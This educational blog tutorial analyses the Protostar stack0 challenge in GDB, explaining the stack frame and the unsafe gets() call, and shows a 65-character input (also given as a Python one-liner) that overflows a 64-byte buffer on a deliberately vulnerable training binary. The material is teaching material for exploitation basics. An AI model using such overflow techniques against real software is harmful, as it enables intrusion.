This article was published on the 12th of September 2018. This article was updated on the 11th of May 2020.

Table of contents

The previous article explained the working of the stack and the way variables are stored on the stack. In this practical case, the stack0 challenge from Protostar will be analysed.

Protostar is a bootable ISO image with a Linux distribution (Debian), together with a set of challenges and certain tooling (e.g. Python and GDB). Most ‘modern’ safety measures have been disabled on the provided system, such as Address Space Layout Randomisation (ASLR) and Non-Executable (NX) memory.

The approach of this practical case differs from the original Protostar challenge, although the binary does not differ from the original challenge. The Protostar challenges provide the source code and the compiled binaries, after which the user has find and exploit the weakness in each binary to complete the challenges. Using this open approach, the user can compare the source code (the binaries are written in C) and the assembly.

In this article, the analysis will be conducted without the source code. At the end of this case, a copy of the source code is embedded to use as a comparison after the whole analysis has been completed. This way, the goal of this chapter (assembly basics) is highlighted and this approach provides a better insight in the fundamental conccepts that are behind the exploit. Additionally, it is good to know that the provided source code can be compiled as-is, but that the provided solution will not work due to security measures in modern operating systems and compilers. It is therefore required to use the provided Debian ISO.

After booting the ISO in a virtual machine using the provided live boot option, one can log in with the credentials user for both the username and the password. Then, one can use the command bash to use the ‘born again shell’ instead of the default shell. Using the command ip addr, the IP address of the machine can be found. Open a terminal (or PuTTY on Windows) and use SSH to connect to the machine, where [ip] equals the IP of the virtual machine:

ssh user@[ip]

The password remains user, since you now connect onto the virtual machine from the host, instead of connecting locally. Connecting via SSH enables you to easily copy and paste data from and to the terminal, because the host’s clipboard can be used. Note that it is not required since the shared clipboard can be enabled or the user can type the commands manually instead of copying them.

The binary can be found in the /opt/protostar/bin directory. Using the file program in bash, more details can be obtained:

user@protostar:/opt/protostar/bin$ file ./stack0 ./stack0: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped

This provides more insight, firstly it is a 32-bit ELF executable which is not stripped. A stripped binary, which is the default during this course, does not contain debugging symbols. These symbols, such as function names, save time analysing a function to know its purpose. Additionally, this binary is allowed to set the user id. The root user has an ID of 0. Using setuid, the program can elevate its privilege and execute commands as root. This wont be of any importance in this challenge, but it does illustrate how much information the file command provides.

Upon executing the program, it awaits input from the user and then prints a message:

user@protostar:/opt/protostar/bin$ ./stack0 [InputMessage] Try again?

Note that the [InputMessage] is the place where it awaits the input before the execution continues.

GDB comes preinstalled on this system and will be the disassembler during this case. To open a file in GDB, simply provide the location of the file as the parameter in GDB:

cd /opt/protostar/bin gdb ./stack0

To list all functions, use the info functions command. Note that gdb also has autocompletion upon pressing tab. The function naming scheme differs from the scheme in Radare2:

(gdb) info functions All defined functions: File stack0/stack0.c int main(int, char**); Non-debugging symbols: 0x080482bc _init 0x080482fc __gmon_start__ 0x080482fc __gmon_start__@plt 0x0804830c gets 0x0804830c gets@plt 0x0804831c __libc_start_main 0x0804831c __libc_start_main@plt 0x0804832c puts 0x0804832c puts@plt 0x08048340 _start 0x08048370 __do_global_dtors_aux 0x080483d0 frame_dummy 0x08048440 __libc_csu_fini 0x08048450 __libc_csu_init 0x080484aa __i686.get_pc_thunk.bx 0x080484b0 __do_global_ctors_aux 0x080484dc _fini

The function puts writes the provided string to the standard output, together with a trailing newline character. It is therefore logical to see the puts in the list of functions, since the Try again? string was printed during the execution of the program. Using printf in C can result in the usage of puts instead, depending on the decision of the compiler.

Another function which is worth looking at, is the gets function. Using the manuals that are present in most Linux and MacOS distributions (or search for it online if you have no access to those, or are on a different platform), more information can be found regarding the usage and workings of this function. To open the manual page, use the man gets command in the terminal.

FGETS(3) BSD Library Functions Manual FGETS(3) NAME fgets, gets -- get a line from a stream LIBRARY Standard C Library (libc, -lc) SYNOPSIS #include char * fgets(char * restrict str, int size, FILE * restrict stream); char * gets(char *str); DESCRIPTION The fgets() function reads at most one less than the number of characters specified by size from the given stream and stores them in the string str. Reading stops when a newline character is found, at end-of-file or error. The newline, if any, is retained. If any characters are read and there is no error, a `\0' character is appended to end the string. The gets() function is equivalent to fgets() with an infinite size and a stream of stdin, except that the newline character (if any) is not stored in the string. It is the caller's responsibility to ensure that the input line, if any, is sufficiently short to fit in the string. RETURN VALUES Upon successful completion, fgets() and gets() return a pointer to the string. If end-of-file occurs before any characters are read, they return NULL and the buffer contents remain unchanged. If an error occurs, they return NULL and the buffer contents are indeterminate. The fgets() and gets() functions do not distinguish between end-of-file and error, and callers must use feof(3) and ferror(3) to determine which occurred. ERRORS [EBADF] The given stream is not a readable stream. The function fgets() may also fail and set errno for any of the errors specified for the routines fflush(3), fstat(2), read(2), or malloc(3). The function gets() may also fail and set errno for any of the errors specified for the routine getchar(3). SECURITY CONSIDERATIONS The gets() function cannot be used securely. Because of its lack of bounds checking, and the inability for the calling program to reliably determine the length of the next incoming line, the use of this function enables malicious users to arbitrarily change a running program's func- tionality through a buffer overflow attack. It is strongly suggested that the fgets() function be used in all cases. (See the FSA.) SEE ALSO feof(3), ferror(3), fgetln(3), fgetws(3), getline(3) STANDARDS The functions fgets() and gets() conform to ISO/IEC 9899:1999 (``ISO C99''). BSD June 4, 1993 BSD

Other than the description, return value and the possible errors, this manual page provides us with a key piece of information for this challenge: the security considerations. The size of the input can be bigger than the buffer in which it is stored, resulting in an overflow. This overflow occurs in the buffer, which can be stored on the heap or the stack. Therefore, additional memory locations can be overwritten.

To disassemble a function in GDB, use the disassemble command, followed by the name of the function, in this case main: disassemble main:

( gdb ) disassemble main Dump of assembler code for function main : 0x080483f4 <main + 0 > : push % ebp 0x080483f5 <main + 1 > : mov % esp ,% ebp 0x080483f7 <main + 3 > : and $ 0xfffffff0 ,% esp 0x080483fa <main + 6 > : sub $ 0x60 ,% esp 0x080483fd <main + 9 > : movl $ 0x0 , 0x5c ( % esp ) 0x08048405 <main + 17 > : lea 0x1c ( % esp ) ,% eax 0x08048409 <main + 21 > : mov % eax , ( % esp ) 0x0804840c <main + 24 > : call 0x804830c <gets@plt> 0x08048411 <main + 29 > : mov 0x5c ( % esp ) ,% eax 0x08048415 <main + 33 > : test % eax ,% eax 0x08048417 <main + 35 > : je 0x8048427 <main + 51 > 0x08048419 <main + 37 > : movl $ 0x8048500 , ( % esp ) 0x08048420 <main + 44 > : call 0x804832c <puts@plt> 0x08048425 <main + 49 > : jmp 0x8048433 <main + 63 > 0x08048427 <main + 51 > : movl $ 0x8048529 , ( % esp ) 0x0804842e <main + 58 > : call 0x804832c <puts@plt> 0x08048433 <main + 63 > : leave 0x08048434 <main + 64 > : ret End of assembler dump .

Notice how to syntax of the assembly language differs from the one that has been used in this guide so far. This is the AT&T syntax, which is a different way of writing assembly, though it is essentially the same as the Intel syntax. To view the output in the Intel syntax, one needs to switch the disassembly-flavor in GDB to intel with the command: set disassembly-flavor intel. Then, run the disassemble main command again, which should provide the following output:

( gdb ) disassemble main Dump of assembler code for function main : 0x080483f4 <main + 0 > : push ebp 0x080483f5 <main + 1 > : mov ebp , esp 0x080483f7 <main + 3 > : and esp , 0xfffffff0 0x080483fa <main + 6 > : sub esp , 0x60 0x080483fd <main + 9 > : mov DWORD PTR [ esp + 0x5c ] , 0x0 0x08048405 <main + 17 > : lea eax , [ esp + 0x1c ] 0x08048409 <main + 21 > : mov DWORD PTR [ esp ] , eax 0x0804840c <main + 24 > : call 0x804830c <gets@plt> 0x08048411 <main + 29 > : mov eax , DWORD PTR [ esp + 0x5c ] 0x08048415 <main + 33 > : test eax , eax 0x08048417 <main + 35 > : je 0x8048427 <main + 51 > 0x08048419 <main + 37 > : mov DWORD PTR [ esp ] , 0x8048500 0x08048420 <main + 44 > : call 0x804832c <puts@plt> 0x08048425 <main + 49 > : jmp 0x8048433 <main + 63 > 0x08048427 <main + 51 > : mov DWORD PTR [ esp ] , 0x8048529 0x0804842e <main + 58 > : call 0x804832c <puts@plt> 0x08048433 <main + 63 > : leave 0x08048434 <main + 64 > : ret End of assembler dump .

In the first few instructions, the stack frame is set up, the stack is aligned and the stack is set up for the storage of local variables:

0x080483f4 <main + 0 > : push ebp 0x080483f5 <main + 1 > : mov ebp , esp 0x080483f7 <main + 3 > : and esp , 0xfffffff0 0x080483fa <main + 6 > : sub esp , 0x60

The subtraction of 0x60 is exactly what the program needs for the whole stack frame, but not necessarily the size of the variables in the main function. Subtracting more at once saves additional instructions later, thus optimising the code.

Then, the value of 0x0 (zero) is saved at ESP+0x5c:

0x080483fd <main + 9 > : mov DWORD PTR [ esp + 0x5c ] , 0x0

This indicates that it is a variable, who’s value is set to 0. Since the memory is already allocated on the stack with the optimised sub esp,0x60 instruction, the move function saves the variable on the stack at the provided address.

Afterwards, the address of the second variable is loaded with the lea (load effective address) instruction:

0x08048405 <main + 17 > : lea eax , [ esp + 0x1c ] 0x08048409 <main + 21 > : mov DWORD PTR [ esp ] , eax

The lea instruction adds the addresses that are provided in the second parameter in the first parameter without altering the second parameter. To illustrate this, assume that ESP equals 0x01, then the value in EAX would be 0x01+0x1c = 0x1d whilst ESP remains 0x01.

So the outcome of ESP+0x1c is saved in EAX after which the stored value within ESP (at its current address) is set to the value of EAX. This functions nearly the same as pushing EAX on the stack with the push EAX instruction. The reason not to use this, but rather the mov instruction, is compiler optimisation. The allocation of the memory for the stack frame was done at once, meaning that additional allocation of 4 bytes on the stack (which are allocated when the push instruction is executed), needlessly use memory. It is therefore more efficient to use the already set stack pointer and save the result in the already allocated space.

The size of the second variable equals the address of the first variable minus the address of the second variable, in which ESP can be neglected, as it appears in both addresses: 0x5c – 0x1c = 0x40 bytes, which equals 64 bytes in decimal notation.

Then the gets function is called:

0x0804840c <main + 24 > : call 0x804830c <gets@plt>

The gets function uses the parameter it receives via the stack, to write the obtained input to, which is done with the previously mentioned lea instruction at main+17. When the input of the user is received, the gets function returns a pointer to the provided buffer. In the case of an error, NULL is returned. The return value is stored in EAX:

0x08048411 <main + 29 > : mov eax , DWORD PTR [ esp + 0x5c ]

The EAX register is then compared using the test instruction’:

0x08048415 <main + 33 > : test eax , eax

Test performs a bit-wise logical AND operation and sets (amongst others) the Zero Flag (ZF) to 1 if the result of the AND operation is 0. If the result is not 0, the Zero Flag is set to 0, meaning it is not set.

A logical bite-wise AND operation on 0 and 0 always equals 0, which sets the Zero Flag. Since EAX is compared with itself and the assigned value is 0, the flag will always be set. The next instruction is a conditional jump: if the Zero Flag has been set, the jump is taken.

0x08048417 <main + 35 > : je 0x8048427 <main + 51 >

Upon taking the jump, the following instructions remain before the end of the main function is reached:

0x08048427 <main + 51 > : mov DWORD PTR [ esp ] , 0x8048529 0x0804842e <main + 58 > : call 0x804832c <puts@plt> 0x08048433 <main + 63 > : leave 0x08048434 <main + 64 > : ret

The puts function requires a string as a parameter, which is why one can deduce that the mov instruction saves a string on the stack before the call to the puts function is made. To know what string is provided to the puts function, one can use x/s [address] in GDB. The x stands for eXamine and the s requests the examined data in the form of a string. Logically, the provided address is the location which is examined. The string at 0x8048529 equals:

( gdb ) x / s 0x8048529 0x8048529 : "Try again?"

This is the output that is printed after the user input. If the jump is not taken, the main function ends differently:

0x08048419 <main + 37 > : mov DWORD PTR [ esp ] , 0x8048500 0x08048420 <main + 44 > : call 0x804832c <puts@plt> 0x08048425 <main + 49 > : jmp 0x8048433 <main + 63 > [ ... ] 0x08048433 <main + 63 > : leave 0x08048434 <main + 64 > : ret

Note that the […] instructions are skipped due to the unconditional jump and are therefore not executed.

Upon examining the string located at 0x8048500, the result is:

( gdb ) x / s 0x8048500 0x8048500 : "you have changed the 'modified' variable"

So the first variable (the one that was set to zero in the beginning) is apparently named modified and should be changed to something other than its default value (which equals 0). If the value is not equal to 0, the logical bite-wise AND operation will not set the Zero Flag and the jump will not be taken.

The modified integer, which equals 0 by default, should be altered to something other than 0. The stack is filled with a buffer of 64 bytes before the modified integer is located on the stack, since it was allocated before the buffer was allocated (remember that the stack grows downwards). The start of the user input begins at the buffer of 64 bytes. The buffer is filled via a function that has no boundary checks.

From this short summary, the following approach can be deduced: provide an input bigger than the 64 byte buffer that is given to the gets function. This will also overflow into the modified variable, since it is next on the stack. Providing too much characters as an input would result in a segmentation fault, as the return addresses in the stack frame would get altered to invalid locations.

The input to overflow the buffer can be done manually with an input of 65 (66, 67 or 68) characters when the program asks for input:

user@protostar:/opt/protostar/bin$ ./stack0 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa you have changed the 'modified' variable

Note that more characters are allowed due to the additional space that is left on the stack, but the characters 65 through 68 are the exact location of the modified variable on the stack. Providing more than 79 characters still provides the message that the modified has been changed, whilst also causing a segmentation fault.

Additionally, this can be done with Python, since it is more efficient and less prone to errors:

user@protostar:/opt/protostar/bin$ python -c 'print "a"*65' | ./stack0 you have changed the 'modified' variable

The source code of the challenge, as provided by Protostar:

#include <stdlib.h> #include <unistd.h> #include <stdio.h> int main ( int argc , char ** argv ) { volatile int modified ; char buffer [ 64 ] ; modified = 0 ; gets ( buffer ) ; if ( modified != 0 ) { printf ( "you have changed the 'modified' variable

" ) ; } else { printf ( "Try again?

" ) ; } }

The next article regarding the “Crash course” can be found here!.

To contact me, you can e-mail me at [info][at][maxkersten][dot][nl], send me a PM on Reddit or DM me on Twitter @LibraAnalysis.